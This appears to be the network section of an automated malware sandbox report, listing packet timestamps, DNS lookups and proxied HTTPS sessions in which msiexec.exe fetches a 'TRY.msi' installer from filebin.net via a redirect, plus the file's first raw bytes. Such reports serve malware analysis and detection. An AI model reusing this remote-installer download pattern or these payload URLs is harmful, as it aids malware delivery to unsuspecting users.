Apr 20, 2022 09:28:15.569677114 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.569749117 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.570034981 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.570070028 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.570210934 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.570235968 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.570311069 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.570600986 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.570636988 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.572231054 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.572263002 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.574218988 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.578587055 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.666692972 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.666728973 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.666825056 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.666874886 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.666939020 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.666969061 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.667006016 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.667018890 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.667031050 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.667243004 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.667252064 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.667427063 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.667455912 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.667849064 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.667934895 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.667953014 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.667974949 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.667987108 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.667996883 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668015957 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668101072 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.668117046 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668135881 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668150902 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.668159962 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668272018 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.668279886 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.668301105 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668325901 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668350935 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668390989 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668395042 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.668412924 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.668502092 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.668513060 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.669606924 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.674189091 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.674215078 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:15.674241066 CEST	49744	443	192.168.2.5	87.238.33.8
Apr 20, 2022 09:28:15.674249887 CEST	443	49744	87.238.33.8	192.168.2.5
Apr 20, 2022 09:28:44.069366932 CEST	49775	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:44.069423914 CEST	443	49775	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:44.069504023 CEST	49775	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:44.134568930 CEST	49775	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:44.134629011 CEST	443	49775	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:44.233028889 CEST	443	49775	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:44.233309031 CEST	49775	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:44.310699940 CEST	49775	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:44.310738087 CEST	443	49775	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:44.311113119 CEST	443	49775	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:44.365624905 CEST	49775	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:44.406208038 CEST	443	49775	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:44.500854015 CEST	443	49775	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:44.500933886 CEST	443	49775	185.47.40.36	192.168.2.5
Apr 20, 2022 09:28:44.501041889 CEST	49775	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:44.503742933 CEST	49775	443	192.168.2.5	185.47.40.36
Apr 20, 2022 09:28:44.594660997 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.594734907 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.594830036 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.595274925 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.595299006 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.813781977 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.813920021 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.815942049 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.815964937 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.816420078 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.819874048 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.862209082 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.873063087 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.914868116 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.918911934 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.918936968 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.918975115 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919002056 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919006109 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.919015884 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919038057 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919055939 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.919089079 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919109106 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.919152975 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919190884 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919219971 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919233084 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919231892 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.919251919 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.919285059 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.919305086 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.964762926 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.964895010 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.964909077 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.964946032 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.964987993 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.965075970 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.965152979 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.965154886 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.965178013 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.965231895 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.965272903 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.965292931 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.965364933 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.965374947 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.965393066 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:44.965461969 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:44.965471029 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.010006905 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010133028 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.010138988 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010195017 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010210991 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.010493994 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010580063 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.010596991 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010621071 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010665894 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.010679960 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010714054 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.010740042 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.010817051 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010905981 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.010910988 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010963917 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.010977030 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.011138916 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011276007 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.011291027 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011312962 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011368990 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.011409044 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.011485100 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011554956 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011557102 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.011573076 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011626005 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.011681080 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011748075 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.011754036 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011773109 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.011822939 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.017792940 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.051127911 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.051228046 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.051259995 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.051285982 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.051309109 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.051326990 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.055664062 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.055778980 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.055794001 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.055813074 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.055865049 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.055888891 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.056243896 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.056335926 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.056343079 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.056369066 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.056430101 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.056605101 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.056701899 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.056704044 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.056731939 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.056791067 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.056968927 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057053089 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057056904 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.057076931 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057126045 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.057320118 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057393074 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057404041 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.057415962 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057465076 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.057610989 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057684898 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057692051 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.057703972 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.057760954 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058080912 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058152914 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058204889 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058219910 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058245897 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058265924 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058356047 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058429956 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058444023 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058453083 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058486938 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058506012 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058582067 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058655024 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058671951 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058681011 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058831930 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.058850050 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.058926105 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.059051037 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.059070110 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.059144974 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.059150934 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.059163094 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.059222937 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.073734045 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.096816063 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.096904993 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.096985102 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.097004890 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.097018003 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.097059011 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.101188898 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.101269960 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.101346016 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.101356983 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.101382017 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.101407051 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.101424932 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.101504087 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.101505995 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.101526022 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.101566076 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.101584911 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.104628086 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.104707956 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.104795933 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.104810953 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.104831934 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.104861975 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.104887009 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.104965925 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.104970932 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.104988098 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.105043888 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.105134010 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.105204105 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.105211973 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.105231047 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.105267048 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.105369091 CEST	443	49776	87.238.33.7	192.168.2.5
Apr 20, 2022 09:28:45.105717897 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.298865080 CEST	49776	443	192.168.2.5	87.238.33.7
Apr 20, 2022 09:28:45.448488951 CEST	49776	443	192.168.2.5	87.238.33.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2022 09:28:14.554792881 CEST	54322	53	192.168.2.5	8.8.8.8
Apr 20, 2022 09:28:14.605547905 CEST	53	54322	8.8.8.8	192.168.2.5
Apr 20, 2022 09:28:15.045897961 CEST	62704	53	192.168.2.5	8.8.8.8
Apr 20, 2022 09:28:15.097917080 CEST	53	62704	8.8.8.8	192.168.2.5
Apr 20, 2022 09:28:44.012177944 CEST	63187	53	192.168.2.5	8.8.8.8
Apr 20, 2022 09:28:44.028873920 CEST	53	63187	8.8.8.8	192.168.2.5
Apr 20, 2022 09:28:44.535057068 CEST	60658	53	192.168.2.5	8.8.8.8
Apr 20, 2022 09:28:44.588800907 CEST	53	60658	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 20, 2022 09:28:14.554792881 CEST	192.168.2.5	8.8.8.8	0xae2d	Standard query (0)	filebin.net	A (IP address)	IN (0x0001)
Apr 20, 2022 09:28:15.045897961 CEST	192.168.2.5	8.8.8.8	0xbffb	Standard query (0)	situla.bitbit.net	A (IP address)	IN (0x0001)
Apr 20, 2022 09:28:44.012177944 CEST	192.168.2.5	8.8.8.8	0x4ff4	Standard query (0)	filebin.net	A (IP address)	IN (0x0001)
Apr 20, 2022 09:28:44.535057068 CEST	192.168.2.5	8.8.8.8	0xf334	Standard query (0)	situla.bitbit.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 20, 2022 09:28:14.605547905 CEST	8.8.8.8	192.168.2.5	0xae2d	No error (0)	filebin.net	185.47.40.36	A (IP address)	IN (0x0001)
Apr 20, 2022 09:28:15.097917080 CEST	8.8.8.8	192.168.2.5	0xbffb	No error (0)	situla.bitbit.net	87.238.33.8	A (IP address)	IN (0x0001)
Apr 20, 2022 09:28:15.097917080 CEST	8.8.8.8	192.168.2.5	0xbffb	No error (0)	situla.bitbit.net	87.238.33.7	A (IP address)	IN (0x0001)
Apr 20, 2022 09:28:44.028873920 CEST	8.8.8.8	192.168.2.5	0x4ff4	No error (0)	filebin.net	185.47.40.36	A (IP address)	IN (0x0001)
Apr 20, 2022 09:28:44.588800907 CEST	8.8.8.8	192.168.2.5	0xf334	No error (0)	situla.bitbit.net	87.238.33.7	A (IP address)	IN (0x0001)
Apr 20, 2022 09:28:44.588800907 CEST	8.8.8.8	192.168.2.5	0xf334	No error (0)	situla.bitbit.net	87.238.33.8	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

filebin.net

situla.bitbit.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49742	185.47.40.36	443	C:\Windows\System32\msiexec.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-20 07:28:14 UTC	0	OUT	GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows Installer Host: filebin.net
2022-04-20 07:28:15 UTC	0	IN	HTTP/1.1 302 Found Cache-Control: max-age=0 Location: https://situla.bitbit.net/filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072814Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=81a6b2d7f153c8ae19ac27531faf11add08f39212f5a9e9b8b8b46feec74e3da X-Robots-Tag: noindex Date: Wed, 20 Apr 2022 07:28:14 GMT Content-Length: 0 X-Varnish: 295248 Age: 0 Via: 1.1 varnish (Varnish/6.0) Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49744	87.238.33.8	443	C:\Windows\System32\msiexec.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-20 07:28:15 UTC	0	OUT	GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072814Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=81a6b2d7f153c8ae19ac27531faf11add08f39212f5a9e9b8b8b46feec74e3da HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows Installer Host: situla.bitbit.net
2022-04-20 07:28:15 UTC	1	IN	HTTP/1.1 200 OK Content-Length: 491520 Accept-Ranges: bytes Last-Modified: Wed, 20 Apr 2022 01:28:19 GMT ETag: "260bec1b34ce96e5ed6c42d51e7146fb" Cache-Control: max-age=30 Content-Disposition: filename="TRY.msi" x-amz-request-id: tx000000000000000eeee3f-00625fb60f-3b49846f-default Content-Type: application/msword Date: Wed, 20 Apr 2022 07:28:15 GMT Connection: close
2022-04-20 07:28:15 UTC	1	IN	Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: >
